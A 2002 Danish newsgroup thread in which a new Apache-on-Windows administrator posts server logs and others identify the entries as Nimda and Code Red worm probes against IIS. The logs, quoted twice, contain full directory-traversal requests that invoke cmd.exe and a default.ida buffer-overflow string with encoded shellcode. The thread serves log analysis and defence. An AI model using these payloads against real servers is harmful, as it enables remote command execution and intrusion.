|
| Hjælp til log-fil, Apache http server på w~ Fra : Anders Fiedel |
Dato : 17-08-02 23:24 |
|
Hej,
Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
ikke.
Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
Win2k.
Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
ikke have gået efter noget specifikt.
Håber der er nogen der kan hjælpe/tyde dette.
Acces LOG
80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 286
80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 284
80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 325
80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 328
Error LOG
[Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
[Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/root.exe
[Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/root.exe
[Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/d/winnt/system32/cmd.exe
[Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
[Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Á/winnt/system32/cmd.exe
[Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
[Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe
[Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
malformed Host header
| |
Himbergeist (18-08-2002)
| Kommentar Fra : Himbergeist |
Dato : 18-08-02 01:30 |
|
> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
Ligner et typisk angreb fra en eller anden inficeret IIS.
Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.
> Jeg har fast IP og skal til og have et site op og stå, serveren er apache
på
> Win2k.
Da du bruger apache kan du lystigt ignorere den.
Den eneste skade den gør er at fylde dine access.log filer med støj.
- cep
| |
Anders Fiedel (18-08-2002)
| Kommentar Fra : Anders Fiedel |
Dato : 18-08-02 02:07 |
|
Takker,
Hvad er det bedste at gøre for at beskytte min server og resten af den PC
mod angreb.
Jeg har Sygate Pro kørende, men er det nok og skal den konfigureres specielt
eller kører den bare.
Anders
"Himbergeist" <REMOVEsnurrberget@yahoo.com> skrev i en meddelelse
news:3d5eeb85$0$94714$edfadb0f@dspool01.news.tele.dk...
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
her.
> > Og hvad er det for filer der er forsøgt eksekveret, de eksisterer
åbenbart
> > ikke.
> Ligner et typisk angreb fra en eller anden inficeret IIS.
> Ejeren af maskinen aner sandsynligvis ikke at han er angrebet.
>
> > Jeg har fast IP og skal til og have et site op og stå, serveren er
apache
> på
> > Win2k.
>
> Da du bruger apache kan du lystigt ignorere den.
> Den eneste skade den gør er at fylde dine access.log filer med støj.
>
>
> - cep
>
>
| |
Kasper Dupont (18-08-2002)
| Kommentar Fra : Kasper Dupont |
Dato : 18-08-02 13:26 |
|
Anders Fiedel wrote:
>
> Takker,
> Hvad er det bedste at gøre for at beskytte min server og resten af den PC
> mod angreb.
De konkrete angreb har du allerede sikret dig mod ved at vælge en anden
webserver end lige netop IIS. Og uanset hvilken software man bruger, skal
man sørge for at opdatere den hurtigst muligt, når der bliver rettet fejl
med indflydelse på sikkerheden.
--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk
| |
Carsten Nielsen (18-08-2002)
| Kommentar Fra : Carsten Nielsen |
Dato : 18-08-02 14:39 |
|
"Anders Fiedel" <fiedel@c.dk> wrote in message news:<3d5eccf6$0$94733$edfadb0f@dspool01.news.tele.dk>...
> Hej,
>
> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på her.
> Og hvad er det for filer der er forsøgt eksekveret, de eksisterer åbenbart
> ikke.
> Jeg har fast IP og skal til og have et site op og stå, serveren er apache på
> Win2k.
> Det eneste der ligger på serveren er en dummy side til test. Så gæsten kan
> ikke have gået efter noget specifikt.
> Håber der er nogen der kan hjælpe/tyde dette.
>
> Acces LOG
> 80.62.51.126 - - [17/Aug/2002:10:01:57 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
cmd.exe er den der eksekverer det der svarer til DOS kommandoer, dir,
delete, mkdir etc. Når der står dir efter det, må det være et forsøg
på at liste nogle filer.
> 80.62.51.126 - - [17/Aug/2002:10:01:59 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:01 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.62.51.126 - - [17/Aug/2002:10:02:05 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:08 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
> 80.62.51.126 - - [17/Aug/2002:10:02:10 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.62.51.126 - - [17/Aug/2002:10:02:12 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
Samme kommentar, det er forskellige måder at kalde kommandoen på, alt
efter hvor cmd.exe ligger på systemet.
> 80.14.34.74 - - [17/Aug/2002:13:34:20 +0200] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 286
> 80.14.34.74 - - [17/Aug/2002:13:34:25 +0200] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 284
Her er det root.exe virusen vil starte. Hvad root.exe laver ved jeg
ikke lige.
> 80.14.34.74 - - [17/Aug/2002:13:34:31 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:34 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
> 80.14.34.74 - - [17/Aug/2002:13:34:37 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
> 80.14.34.74 - - [17/Aug/2002:13:34:43 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:46 +0200] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 325
> 80.14.34.74 - - [17/Aug/2002:13:34:49 +0200] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 341
> 80.14.34.74 - - [17/Aug/2002:13:34:51 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:34:57 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:00 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:03 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
> 80.14.34.74 - - [17/Aug/2002:13:35:15 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
Igen cmd.exe + dir for nogle flere steder på systemet.
> 63.228.146.7 - - [17/Aug/2002:13:53:05 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 328
>
Dette er et forsøg på buffer overrun. NNN'erne skal fylde bufferen og
resten blever skrevet oveni en del af program-koden, som man så kalder
før eler siden.
>
> Error LOG
>
> [Sat Aug 17 10:02:12 2002] [error] [client 80.62.51.126] File does not
> exist: f:/wwwroot/scripts/..%2f/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:20 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/root.exe
> [Sat Aug 17 13:34:25 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/root.exe
> [Sat Aug 17 13:34:31 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:34 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/d/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:37 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:43 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:46 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
> [Sat Aug 17 13:34:49 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/msadc/..%5c/..%5c/..%5c/..Á /..Á /..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:34:51 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Á /winnt/system32/cmd.exe
> [Sat Aug 17 13:35:00 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..À¯/winnt/system32/cmd.exe
> [Sat Aug 17 13:35:03 2002] [error] [client 80.14.34.74] File does not exist:
> f:/wwwroot/scripts/..Áo/winnt/system32/cmd.exe
Da cmd.exe ikke ligger her, blev den ikke fundet.
> [Sat Aug 17 13:53:05 2002] [error] [client 63.228.146.7] Client sent
> malformed Host header
Det er buffer overrunnen som den ikke kunne acceptere. Så Apache er
konstrueret godt nok til at det ikke lykkes.
Med venlig hilsen
Carsten Nielsen
| |
Peder Vendelbo Mikke~ (18-08-2002)
| Kommentar Fra : Peder Vendelbo Mikke~ |
Dato : 18-08-02 22:47 |
|
Anders Fiedel skrev:
> Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> her.
Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
ikke husker forkert et det Nimda, Code Red og Code Red II.
Kontakt pågældendes udbyder for at få det stoppet, vedkommende der ejer
maskinen ved sikkert ikke at den er inficeret. Ud fra din logfil med
tidsstempel, kan udbyderen finde ud af hvem kunden er.
> Acces LOG
> 80.62.51.126
<URL: http://samspade.org/t/lookat?a=80.62.51.126 >
TDC, kontakt csirt(hos)csirt.dk
> 80.14.34.74
<URL: http://samspade.org/t/lookat?a=80.14.34.74 >
Wanadoo-kunde i frankrig, kontakt abuse(hos)francetelecom.net
> 63.228.146.7
<URL: http://samspade.org/t/lookat?a=63.228.146.7 >
Kontakt abuse(hos)uswest.net
--
Fix Outlook Express 5.*. Nu med emoticons, _understreget_,
/skråtstillet/ og *fed* tekst: <URL: http://flash.to/oe-quotefix >
| |
Kasper Dupont (19-08-2002)
| Kommentar Fra : Kasper Dupont |
Dato : 19-08-02 07:56 |
|
Peder Vendelbo Mikkelsen wrote:
>
> Anders Fiedel skrev:
>
> > Er der nogen der kan fortælle mig hvad pågældende gæst har prøvet på
> > her.
>
> Det er inficerede pcere som forsøger at inficere din maskine, hvis jeg
> ikke husker forkert et det Nimda, Code Red og Code Red II.
Code Red angreb udgør kun en meget lille procentdel af angrebene.
Code Red II eksisterer ikke mere, den havde indbygget en selv-
destruktion. Så i dag er der stort set kun Nimda angrebene
tilbage.
--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk
| |
|
|